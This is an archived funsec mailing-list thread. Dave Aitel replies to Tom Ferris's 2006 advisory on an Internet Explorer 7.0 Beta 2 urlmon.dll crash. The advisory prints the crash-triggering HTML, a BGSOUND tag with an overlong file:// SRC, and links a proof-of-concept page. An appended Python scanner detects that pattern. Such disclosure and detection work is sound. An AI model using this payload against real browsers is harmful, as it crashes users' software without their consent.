funsec mailing list archives

Re: Internet Explorer 7.0 Beta 2 urlmon.dll DoS


From: Dave Aitel <dave.aitel () gmail com>
Date: Thu, 2 Feb 2006 19:48:59 -0500

I like your workaround. I guess my question is: why is your fuzzer so much
better than theirs? What kind of bug is this, and how did it slip by?

-dave


On 2/1/06, Tom Ferris <tommy () security-protocols com> wrote:

Internet Explorer 7.0 Beta 2 urlmon.dll DoS

Release Date:
Jan 31, 2006

Severity:
Medium

Vendor:
Microsoft

Versions Affected:
Internet Explorer 7.0 Beta 2 (7.0.5296.0)

Overview:
A denial of service vulnerability exists within Microsoft Internet
Explorer 7.0 Beta 2 which allows for an attacker to cause the browser to
crash, and/or to execute arbitrary code on the targeted host.

Technical Details:
When running a specially crafted .html file, urlmon.dll
improperly parses the 'BGSOUND SRC=file://---' (approx. 344 dashes) and
causes the crash.

The following html code will trigger the crash:

<BGSOUND

SRC=file://---------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
---------------------------------- >

or hit the following url:

http://www.security-protocols.com/poc/sp-x23.html

Vendor Status:
Microsoft was notified.

Workaround:
Mozilla Firefox

Discovered by:
Tom Ferris
<tommy[at]security-protocols[dot]com>

Related Links:
http://www.security-protocols.com/advisory/sp-x23.txt
http://security-protocols.com/modules.php?name=News&file=article&sid=3169
http://www.microsoft.com/windows/IE/ie7/ie7betaredirect.mspx

Copyright (c) 2006 Security-Protocols.com

-----

Tom Ferris
Researcher
www.security-protocols.com
Key fingerprint = 0DFA 6275 BA05 0380 DD91  34AD C909 A338 D1AF 5D78
_______________________________________________
Fun and Misc security discussion for OT posts.
https://linuxbox.org/cgi-bin/mailman/listinfo/funsec
Note: funsec is a public and open mailing list.
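
A content check for the pattern the advisory describes (a BGSOUND tag whose SRC is a file:// URL padded with a long run of one character), added here as an example; it is not part of the original posts or of any vendor tooling. The names `BgsoundScanner` and `scan_html` and both thresholds are assumptions chosen for illustration.

```python
import re
from html.parser import HTMLParser

# Assumed thresholds (not from the advisory): tune against your own traffic.
MAX_SRC_LEN = 256   # longest SRC value accepted without comment
MAX_RUN = 64        # longest run of one repeated character accepted

RUN_RE = re.compile(r"(.)\1{%d,}" % (MAX_RUN - 1), re.DOTALL)


class BgsoundScanner(HTMLParser):
    """Collects BGSOUND tags whose SRC looks like the pattern in the advisory."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []  # (line number, SRC length, [reasons])

    def handle_starttag(self, tag, attrs):
        # HTMLParser lower-cases tag and attribute names and accepts
        # unquoted values, so <BGSOUND SRC=file://...> is covered.
        if tag != "bgsound":
            return
        for name, value in attrs:
            if name != "src" or not value:
                continue
            reasons = []
            if value.lower().startswith("file:"):
                reasons.append("file-scheme")
            if len(value) > MAX_SRC_LEN:
                reasons.append("overlong")
            if RUN_RE.search(value):
                reasons.append("repeated-char-run")
            if reasons:
                self.findings.append((self.getpos()[0], len(value), reasons))


def scan_html(text):
    """Return the findings for one HTML document given as a string."""
    scanner = BgsoundScanner()
    scanner.feed(text)
    scanner.close()
    return scanner.findings


if __name__ == "__main__":
    # Constructed sample inputs, built inline so the check runs offline.
    flagged = "<html><body>\n<BGSOUND SRC=file://" + "-" * 344 + " >\n</body></html>"
    benign = '<html><body><bgsound src="chime.wav" loop="1"></body></html>'
    print(scan_html(flagged))
    print(scan_html(benign))
```

Each finding carries the line number of the tag, the length of the SRC value and the reasons it was flagged, so a mail or web gateway can log or quarantine the page.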
